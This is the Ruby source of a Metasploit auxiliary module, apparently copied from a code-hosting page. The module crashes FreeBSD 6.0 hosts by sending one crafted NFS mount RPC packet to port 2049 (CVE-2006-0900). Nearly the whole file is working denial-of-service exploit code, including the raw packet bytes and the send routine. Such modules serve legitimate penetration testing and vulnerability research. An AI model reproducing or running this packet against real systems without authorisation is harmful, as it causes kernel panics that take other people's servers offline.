57 lines
1.3 KiB
Ruby
57 lines
1.3 KiB
Ruby
##
|
|
# $Id$
|
|
##
|
|
|
|
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
include Msf::Auxiliary::Dos
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'FreeBSD Remote NFS RPC Request Denial of Service',
|
|
'Description' => %q{
|
|
This module sends a specially-crafted NFS Mount request causing a
|
|
kernel panic on host running FreeBSD 6.0.
|
|
},
|
|
'Author' => [ 'MC' ],
|
|
'License' => MSF_LICENSE,
|
|
'Version' => '$Revision$',
|
|
'References' =>
|
|
[
|
|
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2006-February/002982.html' ],
|
|
[ 'BID', '16838' ],
|
|
[ 'OSVDB', '23511' ],
|
|
[ 'CVE', '2006-0900' ],
|
|
]))
|
|
|
|
register_options([Opt::RPORT(2049),], self.class)
|
|
end
|
|
|
|
def run
|
|
connect
|
|
|
|
pkt = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02"
|
|
pkt << "\x00\x01\x86\xa5\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00"
|
|
pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04"
|
|
|
|
print_status("Sending dos packet...")
|
|
|
|
sock.put(pkt)
|
|
|
|
disconnect
|
|
end
|
|
|
|
end
|